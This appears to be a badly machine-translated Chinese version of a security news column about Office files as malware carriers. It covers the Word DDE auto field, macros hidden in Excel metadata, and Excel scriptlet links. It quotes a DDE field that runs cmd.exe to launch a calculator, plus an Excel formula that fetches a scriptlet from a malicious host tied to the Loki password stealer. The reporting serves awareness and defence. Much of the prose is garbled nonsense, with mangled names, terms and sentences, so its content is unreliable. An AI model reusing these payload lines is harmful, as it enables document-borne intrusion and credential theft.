办公室作为恶意软件交付平台：DDE，scriptlet，宏混淆

我，因为一个人，以为办公室的恶意软件在20世纪90年代后期达到了Zenith，其中包括梅丽莎。当然，我们在过去的二十年中看到了基于宏的颈部痛苦的颈部仓库，包括一些专门攻击MAC的宏恶意软件，而是通过较大，单词，Excel和较小程度，PowerPoint现在抛出警告对话到中间的攻击。那些具有恶意意图的人已经转移到更环保的领域。

还是有他们？

一些聪明的研究人员已经找到了新的和意想不到的方法来获取Word，Excel和PowerPoint文档，以提供各种恶意软件 - 伦纸软件，即使是一个新发现的凭证偷窃师，专门收集用户名和密码。

在许多情况下，这些新用途采用旧的方法作为山丘。但旧的警告标志不起作用以及他们曾经做过：对截图中的挑战面临着截图，现在许多人，现在不会犹豫，点击是。

{ddeauto}的力量

深入潜入词语，您可以找到一个名为字段的功能。尽可能地告诉我，宏之前存在字段。领域背后的想法很简单：您在文档中粘贴了一个字段代码，这个词可以以某种方式计算或放在一起。而不是向您展示现场代码，而是通过计算结果来计算并向您展示。例如，字段代码{页面}返回当前页码。

细节可能会变得棘手：我的黑客Windows Word的指南包含85页的字段代码及其overuse结果。在23年前，你好。

{ddeauto}字段代码必须返回Charles Simonyi的时间。它用于指示Word来启动另一个应用程序，并将数据放入该应用程序或从中拉数据。例如，该领域

{ddeauto Excel C：//xldata//addrlist.xls r5c1：r5c9}

告诉Word要启动Excel，打开名为Addrlist.xls的文件，将行5列1的内容拉到9，并将它们粘在Word文档中。打开Word文档时{ddeauto}字段触发（这是“自动”部分）。

在检索（或发送）数据之前，Word踢出像上述屏幕截图中的警告消息。如果引用的程序未运行，则会收到一条额外的消息，询问启动应用程序是否可以。

去年10月，Etienne Stalmans和Saif El-Sherei发布了一篇文章的SensePost博客，描述了一种完全正常的使用古代技术的方法。他们汇集了这一领域：

{ddeauto c：//windows//system32//cmd.exe“/ k calc.exe”}

并发现它踢出Windows计算器，只要打开文档的人在这两个警告对话框中单击“是”。

起初，看起来很好：{ddeauto}正常工作，因为它在扑鼻缩弯的方式工作的方式，因为较冷的风扇。但是，我们中的一些人开始感到不安。是的，这就是它应该工作的方式 - 但是潜在的安全漏洞，值得增加的好处吗？

Twitter上的Kevin Beaumont（@Gossithedog）为火焰添加了更多的燃料：

还记得@SensePost找到的DDE问题这个词吗？将DDE从单词复制到Outlook中，然后将其电子邮件发送给某人。没有附着 - >计算。随着技术的方式，它非常甜蜜，因为AV扫描没有附件。Outlook使用Word作为电子邮件编辑器，它会产生ddeauto。奖金副作用 - 如果在组策略中禁用CMD.EXE，则它在声称禁用之前执行exe IN / K参数。

情况迅速恶化。匹兹堡（@AREKFURR）的高潮布莱恩（@AREKFURT）布置了时间表：

到10月27日，我们在Computerworld提出了一条警告。11月8日，Microsoft发布的安全咨询4053440，其中描述了问题并提供了一些解决方案。

12月12日，作为本月的补丁周二的一部分，Microsoft发布了所有版本的单词的更新 - 即使是支持超出支持的Word 2003和Word 2007 - 通过禁用{ddeauto}和“自动更新来解决问题任何链接字段，包括DDE“一般。

每个安全咨询170021更新KB 4011575,4011590,4011608,4011612和4011614都包含更改，它们都禁用{ddeauto}。安装了修补程序后，将有新的注册表项可用，您可以手动更改以重新启用{ddeauto}。

Excel和PowerPoint尚未类似地蹒跚。它们都已经有手动访问的设置，禁用自动设置（文件>选项>信任中心>信任中心设置>外部内容）。

所以它看起来好像现在插入{ddeauto}孔。

Excel Stealthy Macros.

本周早些时候，Xavier Mertens在Sans Internet Storm Center博客上发表了一个照明黑客。通过元数据称为Microsoft Office VBA宏混淆，MERTENS找到了一种运行宏的方法，其中批量在电子表格的元数据中隐藏了庞大的部分。

当宏运行 - 并且用户必须单击以允许它运行 - 宏从元数据中提取恶意代码，绕过大多数恶意软件扫描仪。看起来像一个奇怪的宏观的看起来是一个奇怪的宏，结果是一个带着f牙的恶魔。

非常聪明。

Excel Scriptlet.

今天早些时候，Andy Norton在Security公司持续的终点，发布了通过Excel电子表格传递的攻击分析，不使用宏，不使用DDE，但确实使用外部链接开始了一个scriptlet。Scriptlet是“用于脚本语言的Microsoft XML包装器，以将自己注册为COM对象并执行”。

在攻击演示的核心上是一个如此如此如此：

=包/'脚本：http：// magchris [。] ga /图片/ squrey.xml'！“”

打开工作表时，Excel会提示用户有关更新外部链接，并且如果授予权限，则Scriptlet运行。在这种情况下，scriptlet踢了一个vbscript程序，这是肮脏的契约。

今天的公告包括在野外中找到的漏洞，该漏洞在安装用户名和密码窃取程序Loki中。诺顿通过病毒总量将电子表格放入，只有少数防病毒产品抓住它。诺顿说，人们追捕感染的来源，

必须通过各种日志来跟踪，直到他们找到与Gabon顶级域的连接，从下载可执行文件 - _OUTPUT23476823784.exe - 对受害者提供的免费Web托管服务提供。提供了此信息，他们将对第二阶段有效载荷进行进一步扫描，或者寻找有效载荷的已知IOC。

这是一个奇怪的新世界。

在askwoody休息室加入抱怨的灰色牛排。